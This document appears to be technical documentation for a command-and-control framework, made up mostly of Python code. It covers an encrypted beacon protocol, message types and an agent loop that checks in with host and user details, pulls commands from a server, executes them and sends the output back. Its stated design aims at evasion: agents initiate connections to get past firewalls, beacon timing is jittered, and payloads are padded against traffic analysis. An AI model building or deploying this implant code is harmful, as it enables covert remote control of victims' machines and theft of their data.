Protocol Overview
The C2 protocol uses a binary message format with encrypted payloads. All communication happens over HTTPS through a single /beacon endpoint, with agents initiating all connections to avoid firewall restrictions.
Each message is wrapped in a binary envelope with the following structure:
Wire format (7-byte header + body):
[ magic: 2B | version: 1B | length: 4B | nonce: 12B | ciphertext+tag ]
Struct format '!HBI': big-endian, uint16 + uint8 + uint32.
def pack(payload_dict: dict, key: bytes) -> bytes:
    """Serialise, encrypt, and frame a payload dict into a C2 envelope."""
    if not payload_dict or not isinstance(payload_dict, dict):
        raise ProtocolError("pack: payload_dict must be a non-empty dict")
    try:
        plaintext = json.dumps(payload_dict).encode('utf-8')
    except (TypeError, ValueError) as e:
        raise ProtocolError(f"pack: payload not JSON-serialisable: {e}") from e

    # Apply padding before encryption to obscure plaintext length
    profile = load_active_profile()
    plaintext = pad(plaintext, profile.padding_min, profile.padding_max)
    ciphertext_with_tag, nonce = encrypt(plaintext, key)

    # nonce prepended to body so receiver can split at fixed offset [:12]
    body = nonce + ciphertext_with_tag
    header = struct.pack(HEADER_FORMAT, MAGIC, PROTOCOL_VERSION, len(body))
    return header + body
def unpack(raw: bytes, key: bytes) -> dict:
    """Validate, decrypt, and deserialise a raw C2 envelope into a dict."""
    if len(raw) < HEADER_SIZE:
        raise ProtocolError(
            f"unpack: too short for header: got {len(raw)}B, need {HEADER_SIZE}B"
        )
    try:
        magic, version, body_length = struct.unpack(HEADER_FORMAT, raw[:HEADER_SIZE])
    except struct.error as e:
        raise ProtocolError(f"unpack: header unpack failed: {e}") from e
    if magic != MAGIC:
        raise ProtocolError(
            f"unpack: bad magic: expected 0x{MAGIC:04X}, got 0x{magic:04X}"
        )
    if version != PROTOCOL_VERSION:
        raise ProtocolError(
            f"unpack: unsupported version 0x{version:02X}"
        )

    # Extract nonce and ciphertext from body
    body = raw[HEADER_SIZE : HEADER_SIZE + body_length]
    # Reject envelopes whose body is shorter than the length field claims
    if len(body) != body_length:
        raise ProtocolError(
            f"unpack: truncated body: got {len(body)}B, header says {body_length}B"
        )
    nonce = body[:NONCE_SIZE_BYTES]
    ciphertext_with_tag = body[NONCE_SIZE_BYTES:]
    plaintext = decrypt(ciphertext_with_tag, nonce, key)
    plaintext = strip_padding(plaintext)
    try:
        payload_dict = json.loads(plaintext.decode('utf-8'))
    except (json.JSONDecodeError, UnicodeDecodeError) as e:
        raise ProtocolError(f"unpack: decrypted payload is not valid JSON: {e}") from e
    return payload_dict
Header Fields:
magic (2 bytes): Protocol identifier (0xC2C2)
version (1 byte): Protocol version (0x01)
length (4 bytes): Length of body in bytes
Body Structure:
nonce (12 bytes): Random nonce for AES-GCM encryption
ciphertext+tag: Encrypted JSON payload with 16-byte authentication tag
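The nonce is prepended to the body rather than stored in the header, so it always occupies the first 12 bytes of the body (bytes 7 to 18 of the envelope). The receiver validates the 7-byte header, slices the body using the length field, and then splits the nonce from the ciphertext at that fixed offset.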
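The framing arithmetic above can be checked with a minimal sketch that uses only the standard `struct` module. The constant names mirror those used in `pack` and `unpack`; the helper names `frame` and `split_envelope` and the 16-byte tag constant are assumptions made for illustration, and the body here is dummy bytes rather than real AES-GCM output.

```python
import struct
from typing import Tuple

HEADER_FORMAT = "!HBI"  # big-endian: uint16 magic, uint8 version, uint32 length
HEADER_SIZE = struct.calcsize(HEADER_FORMAT)  # 2 + 1 + 4 = 7 bytes
MAGIC = 0xC2C2
PROTOCOL_VERSION = 0x01
NONCE_SIZE_BYTES = 12
TAG_SIZE_BYTES = 16  # assumed name for the 16-byte authentication tag


def frame(body: bytes) -> bytes:
    """Prefix a body (nonce + ciphertext + tag) with the 7-byte header."""
    return struct.pack(HEADER_FORMAT, MAGIC, PROTOCOL_VERSION, len(body)) + body


def split_envelope(raw: bytes) -> Tuple[bytes, bytes]:
    """Validate the header and return (nonce, ciphertext_with_tag)."""
    if len(raw) < HEADER_SIZE:
        raise ValueError("envelope shorter than header")
    magic, version, body_length = struct.unpack(HEADER_FORMAT, raw[:HEADER_SIZE])
    if magic != MAGIC or version != PROTOCOL_VERSION:
        raise ValueError("bad magic or version")
    body = raw[HEADER_SIZE:HEADER_SIZE + body_length]
    # A valid body holds at least a nonce and a tag, and is not truncated.
    if len(body) != body_length or body_length < NONCE_SIZE_BYTES + TAG_SIZE_BYTES:
        raise ValueError("truncated or undersized body")
    return body[:NONCE_SIZE_BYTES], body[NONCE_SIZE_BYTES:]


# Dummy body: 12 nonce bytes followed by 16 placeholder tag bytes.
envelope = frame(b"\x00" * 12 + b"\x01" * 16)
nonce, rest = split_envelope(envelope)
print(HEADER_SIZE, len(envelope), len(nonce), len(rest))
```

The length field counts the nonce as part of the body, so the smallest well-formed envelope is 7 + 12 + 16 = 35 bytes.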
Message Types
The protocol defines six message types:
MSG_CHECKIN = 'CHECKIN'
MSG_TASK_PULL = 'TASK_PULL'
MSG_TASK_RESULT = 'TASK_RESULT'
MSG_TASK_DISPATCH = 'TASK_DISPATCH'
MSG_HEARTBEAT = 'HEARTBEAT'
MSG_TERMINATE = 'TERMINATE'
CHECKIN
Direction: Agent → Server
Purpose: Register a new agent session
def build_checkin(hostname: str, username: str, os_info: str,
                  agent_ver: str, jitter_pct: int) -> dict:
    """Build a CHECKIN payload dict."""
    msg = _base_payload(MSG_CHECKIN)
    msg['payload'] = {
        'hostname': hostname,
        'username': username,
        'os': os_info,
        'agent_ver': agent_ver,
        'jitter_pct': jitter_pct,
    }
    return msg
Response: Server assigns a session_id (UUID) and returns it to the agent.
TASK_PULL
Direction: Agent → Server
Purpose: Request next pending command
def build_task_pull(session_id: str) -> dict:
    """Build a TASK_PULL payload dict."""
    msg = _base_payload(MSG_TASK_PULL, session_id=session_id)
    msg['payload'] = {'session_id': session_id}
    return msg
Response: Server responds with one of:
TASK_DISPATCH if a command is queued
TASK_PULL with status: no_task if queue is empty
TERMINATE if the session has been deactivated
TASK_DISPATCH
Direction: Server → Agent
Purpose: Send a command for execution
resp = mf._base_payload(mf.MSG_TASK_DISPATCH, session_id=session_id)
resp['payload'] = {
    'task_id': task.task_id,
    'command': task.command,
    'args': task.args,
    'timeout_s': task.timeout_s,
}
TASK_RESULT
Direction: Agent → Server
Purpose: Report command execution results
def build_task_result(session_id: str, task_id: str, stdout: str,
                      stderr: str, exit_code: int, duration_ms: int) -> dict:
    """Build a TASK_RESULT payload dict."""
    msg = _base_payload(MSG_TASK_RESULT, session_id=session_id)
    msg['payload'] = {
        'task_id': task_id,
        'stdout': stdout,
        'stderr': stderr,
        'exit_code': exit_code,
        'duration_ms': duration_ms,
    }
    return msg
HEARTBEAT
Direction: Agent → Server (optional)
Purpose: Keep session alive without pulling tasks
TERMINATE
Direction: Server → Agent
Purpose: Instruct agent to shut down gracefully
The TERMINATE signal is sent when an operator deactivates a session. The agent receives it on the next beacon and calls sys.exit(0).
Base Payload Structure
All messages include mandatory fields:
def _base_payload(msg_type: str, session_id: str = None) -> dict:
    """Return mandatory fields present in every message."""
    if msg_type not in VALID_MSG_TYPES:
        raise ProtocolError(f"unknown msg_type '{msg_type}'")
    return {
        'msg_type': msg_type,
        'session_id': session_id,
        'timestamp': int(time.time()),
        'nonce': uuid.uuid4().hex,  # replay protection
        'payload': {},
    }
msg_type: One of the six defined message types
session_id: UUID assigned during CHECKIN (null for CHECKIN message)
timestamp: Unix timestamp when message was created
nonce: Random UUID hex string for replay protection
payload: Message-specific data
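A receiver could check these mandatory fields before acting on a decoded message. The sketch below is one way to do that, not the project's own validation code: `validate_message` and `MANDATORY_FIELDS` are hypothetical names, and the rule that only CHECKIN may carry a null session_id is an assumption drawn from the field descriptions above.

```python
from typing import List

VALID_MSG_TYPES = {
    "CHECKIN", "TASK_PULL", "TASK_RESULT",
    "TASK_DISPATCH", "HEARTBEAT", "TERMINATE",
}

# Field name -> expected Python type after json.loads()
MANDATORY_FIELDS = {
    "msg_type": str,
    "timestamp": int,
    "nonce": str,
    "payload": dict,
}


def validate_message(msg: dict) -> List[str]:
    """Return a list of problems; an empty list means the message is well-formed."""
    problems = []
    for name, expected in MANDATORY_FIELDS.items():
        if name not in msg:
            problems.append(f"missing field: {name}")
        elif not isinstance(msg[name], expected):
            problems.append(f"wrong type for {name}")

    msg_type = msg.get("msg_type")
    if isinstance(msg_type, str) and msg_type not in VALID_MSG_TYPES:
        problems.append(f"unknown msg_type: {msg_type}")

    # Assumption: only CHECKIN may carry a null session_id.
    if msg_type != "CHECKIN" and not isinstance(msg.get("session_id"), str):
        problems.append("session_id required for non-CHECKIN messages")
    return problems


checkin = {"msg_type": "CHECKIN", "session_id": None,
           "timestamp": 1700000000, "nonce": "ab12", "payload": {}}
print(validate_message(checkin))  # []
```

Returning a list of problems rather than raising on the first one makes it easier to log everything wrong with a malformed message in a single entry.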
Beacon Loop
The agent's main execution loop is implemented in the BeaconLoop class, in three parts: the checkin phase, the main loop, and task execution.
Checkin Phase
def _checkin(self) -> None:
    # Send CHECKIN and store the session_id assigned by the server.
    global logger
    payload = _build_checkin_payload()
    response = _send(payload, self._key)
    self._session_id = (
        response.get('session_id') or
        response.get('payload', {}).get('session_id')
    )
    if not self._session_id:
        raise TransportError(
            'CHECKIN response missing session_id: server may have rejected checkin'
        )
    # Re-create logger with session_id so all subsequent logs are tagged
    logger = update_session(logger, self._session_id)
    logger.info('checkin complete', extra={
        'session_id': self._session_id,
        'hostname': platform.node(),
    })
Main Loop
# Step 2: main beacon loop
while True:
    try:
        # Step 2a: compute jittered sleep interval
        sleep_s = self._sleep_fn(
            config.BEACON_INTERVAL_S,
            self._profile.jitter_pct,
        )
        # Step 2b: log the interval, then sleep
        jitter_s = round(sleep_s - config.BEACON_INTERVAL_S, 3)
        logger.info('sleeping before beacon', extra={
            'interval_s': round(sleep_s, 2),
            'base_s': config.BEACON_INTERVAL_S,
            'jitter_s': jitter_s,
            'session_id': self._session_id,
        })
        time.sleep(sleep_s)
        # Step 2c: send TASK_PULL
        pull_payload = mf.build_task_pull(self._session_id)
        response = _send(pull_payload, self._key)
        msg_type = response.get('msg_type', '')
        self._reset_backoff()
        # Step 2d: task dispatched
        if msg_type == mf.MSG_TASK_DISPATCH:
            self._handle_task_dispatch(response)
        # Step 2e: terminate signal
        elif msg_type == mf.MSG_TERMINATE:
            logger.info('TERMINATE received, shutting down', extra={
                'session_id': self._session_id,
            })
            sys.exit(0)
        # Step 2f: no task, continue loop
        else:
            logger.info('no task', extra={'session_id': self._session_id})
    except TransportError as e:
        # Back off on network failures; do not crash the agent
        logger.warning('transport error', extra={
            'reason': str(e),
            'session_id': self._session_id,
        })
        self._backoff_sleep(reason=str(e))
Task Execution
def _handle_task_dispatch(self, response: dict) -> None:
    # Execute the dispatched task and send the result back to the server.
    inner = response.get('payload', {})
    task_id = inner.get('task_id', '')
    command = inner.get('command', '')
    args = inner.get('args', [])
    timeout_s = inner.get('timeout_s', 30)
    logger.info('task received', extra={
        'task_id': task_id,
        'command': command,
    })
    result = execute(task_id, command, args, timeout_s)
    result_payload = mf.build_task_result(
        session_id=self._session_id,
        task_id=result.task_id,
        stdout=result.stdout,
        stderr=result.stderr,
        exit_code=result.exit_code,
        duration_ms=result.duration_ms,
    )
    _send(result_payload, self._key)
    logger.info('task executed', extra={
        'task_id': task_id,
        'exit_code': result.exit_code,
        'duration_ms': result.duration_ms,
    })
Loop Flow:
- Sleep with jitter: the agent sleeps for BEACON_INTERVAL_S ± jitter
- Send TASK_PULL: the agent requests the next command from the server
- Process response:
  - If TASK_DISPATCH: execute the command and send TASK_RESULT
  - If TERMINATE: exit cleanly with sys.exit(0)
  - If no task: continue to the next iteration
- Error handling:
  - Network errors trigger exponential back-off
  - Unexpected errors are logged but don’t crash the loop
Exponential Back-off
The agent implements retry logic with exponential back-off to handle network failures gracefully:
class BackoffManager:
    # Manages exponential back-off state for retry logic
    _SEQUENCE = [1, 2, 4, 8, 16, 32, 60]  # delay steps in seconds, capped at 60

    def __init__(self):
        self.attempts = 0

    def compute_delay(self) -> float:
        # Return the delay for the current attempt, capped at the last sequence value.
        return float(self._SEQUENCE[min(self.attempts, len(self._SEQUENCE) - 1)])

    def reset(self) -> None:
        # Reset attempt counter after a successful operation.
        self.attempts = 0
Back-off Sequence: 1s → 2s → 4s → 8s → 16s → 32s → 60s (capped)
The back-off counter is reset after any successful beacon, preventing indefinite delays during normal operation.
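The indexing in compute_delay can be traced with a short standalone sketch. The excerpt does not show where attempts is incremented, so this version takes the attempt count as an argument; `delay_for` is a hypothetical helper name, not part of the class.

```python
SEQUENCE = [1, 2, 4, 8, 16, 32, 60]  # same steps as BackoffManager._SEQUENCE


def delay_for(attempts: int) -> float:
    """Delay in seconds after `attempts` consecutive failures, clamped to the last step."""
    return float(SEQUENCE[min(attempts, len(SEQUENCE) - 1)])


# Nine consecutive failures: the index saturates at the final element.
schedule = [delay_for(n) for n in range(9)]
print(schedule)  # [1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 60.0, 60.0, 60.0]
```

Because the index is clamped rather than the value doubled, the last step can be 60 instead of 64 without any extra arithmetic.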
Replay Protection
Each message includes a unique nonce (UUID) that the server stores and checks:
# Step 3: nonce replay check
if not await db.check_and_store_nonce(nonce):
    logger.warning('replay detected', extra={
        'session_id': session_id,
        'nonce': nonce,
    })
    return JSONResponse(status_code=409, content={'error': 'replay detected'})
If a nonce is seen twice, the server rejects the message with a 409 Conflict status code.
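The source does not show how db.check_and_store_nonce is implemented. As an illustration of the check-then-store contract only, here is a minimal in-memory sketch; `NonceCache`, its `ttl_s` parameter, and the expiry policy are assumptions, and a real deployment would presumably use the database the excerpt calls.

```python
import time
from typing import Dict, Optional


class NonceCache:
    """In-memory stand-in for a nonce store (hypothetical; not the project's db layer)."""

    def __init__(self, ttl_s: float = 300.0):
        self._ttl_s = ttl_s
        self._seen: Dict[str, float] = {}  # nonce -> time first seen

    def check_and_store(self, nonce: str, now: Optional[float] = None) -> bool:
        """Return True and record the nonce if it is fresh, False if it is a replay."""
        now = time.monotonic() if now is None else now
        # Drop entries older than the TTL so the cache does not grow without bound.
        for old in [n for n, t in self._seen.items() if now - t > self._ttl_s]:
            del self._seen[old]
        if nonce in self._seen:
            return False
        self._seen[nonce] = now
        return True


cache = NonceCache(ttl_s=10)
print(cache.check_and_store("a1", now=0.0))   # True: first sighting
print(cache.check_and_store("a1", now=5.0))   # False: replay inside the TTL
```

Expiring entries means a nonce could be replayed after the TTL, so a store like this would need to be paired with a freshness check on the message's timestamp field; whether the server does that is not stated in the source.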
Why UUIDs for nonces?
UUIDs provide 122 bits of entropy (version 4), making collisions astronomically unlikely even with billions of messages. This eliminates the need for synchronized counters between agent and server.
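The collision claim can be made concrete with the standard birthday approximation, assuming nonces are drawn uniformly from the 2^122 possible version 4 values. For n messages, and taking one billion as an example:

```latex
p_{\text{collision}} \approx \frac{n(n-1)}{2 \cdot 2^{122}} \approx \frac{n^{2}}{2^{123}},
\qquad
n = 10^{9} \;\Rightarrow\; p_{\text{collision}} \approx \frac{10^{18}}{1.06 \times 10^{37}} \approx 9.4 \times 10^{-20}
```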
Padding Strategy
To prevent traffic analysis based on message size, the protocol applies random padding before encryption:
# Apply padding before encryption to obscure plaintext length
profile = load_active_profile()
plaintext = pad(plaintext, profile.padding_min, profile.padding_max)
The padding is stripped after decryption, ensuring the receiver gets the original plaintext.
Padding obscures the true size of commands and results, making it harder for network observers to infer the type of activity occurring.